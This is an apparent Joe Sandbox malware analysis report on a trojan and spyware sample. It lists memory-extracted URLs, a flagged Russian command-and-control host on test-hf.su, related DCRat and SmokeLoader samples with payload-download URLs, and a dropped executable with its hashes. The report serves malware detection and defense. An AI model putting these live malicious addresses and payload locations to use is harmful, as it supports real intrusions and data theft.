0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://h172956.srv11.test-hf.suqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 13%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.carterandcone.comlqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sajatypeworks.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netDqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ac.ecosia.org/autocomplete?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/cabarga.htmlNqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cTheqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://h172956.srv11.test-hf.su/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 13%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-user.htmlqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fonts.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleaseqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperbrokerhostNetsvc.exe, 00000005.00000002.1918995355.000000000350E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sakkal.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  91.227.16.11
                                                                  		h172956.srv11.test-hf.suRussian Federation
                                                                  		207027EXIMIUS-ASRUtrue

                                                                  General Information

                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                  Analysis ID:1403873
                                                                  Start date and time:2024-03-06 09:51:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 25s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:17
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:CJF0Ri1HrG.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:622AF327A5C66CA6D6D41BF02384B590.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@18/280@2/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  09:52:32API Interceptor143881x Sleep call for process: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  91.227.16.11hT7clR9Gz2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
                                                                  file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/65.exe
                                                                  file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/65.exe
                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/64.exe
                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/64.exe
                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/64.exe
                                                                  GyTbKONlyq.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                  • h167471.srv11.test-hf.su/64.exe
                                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  • h167159.srv11.test-hf.su/61.exe
                                                                  file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                  • h167159.srv11.test-hf.su/54.exe
                                                                  file.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                  • h167159.srv11.test-hf.su/54.exe

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  h172956.srv11.test-hf.suhT7clR9Gz2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 91.227.16.11

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  EXIMIUS-ASRUhT7clR9Gz2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 91.227.16.11
                                                                  file.exeGet hashmaliciousPrivateLoader, RedLineBrowse
                                                                  • 91.227.16.22
                                                                  New_Text_Document.exeGet hashmaliciousFormBook, Lokibot, NSISDropper, RedLineBrowse
                                                                  • 91.227.16.22
                                                                  http://h171008.srv22.test-hf.su/timesync.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.227.16.22
                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLineBrowse
                                                                  • 91.227.16.22
                                                                  file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                                  • 91.227.16.22
                                                                  file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                  • 91.227.16.22
                                                                  file.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                                                  • 91.227.16.22
                                                                  lpD7vDCZmS.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  • 91.227.16.22
                                                                  file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                  • 91.227.16.22

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\Desktop\AFgebewE.loghT7clR9Gz2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    8G3thfOYd2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      z28NBu7i9a.exeGet hashmaliciousDCRatBrowse
                                                                        fzUk1a18ai.exeGet hashmaliciousDCRatBrowse
                                                                          3BZPHrgjMP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            1978044967A8E1C7F632630BC906C6D66B0E64C356345.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              tQxaElvX5D.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  4y2bJd0meT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    3b9330b09929cc5391a31e5780a967d26f21b010b586b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                      Created / dropped Files

                                                                                      C:\PortCommon\hyperbrokerhostNetsvc.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
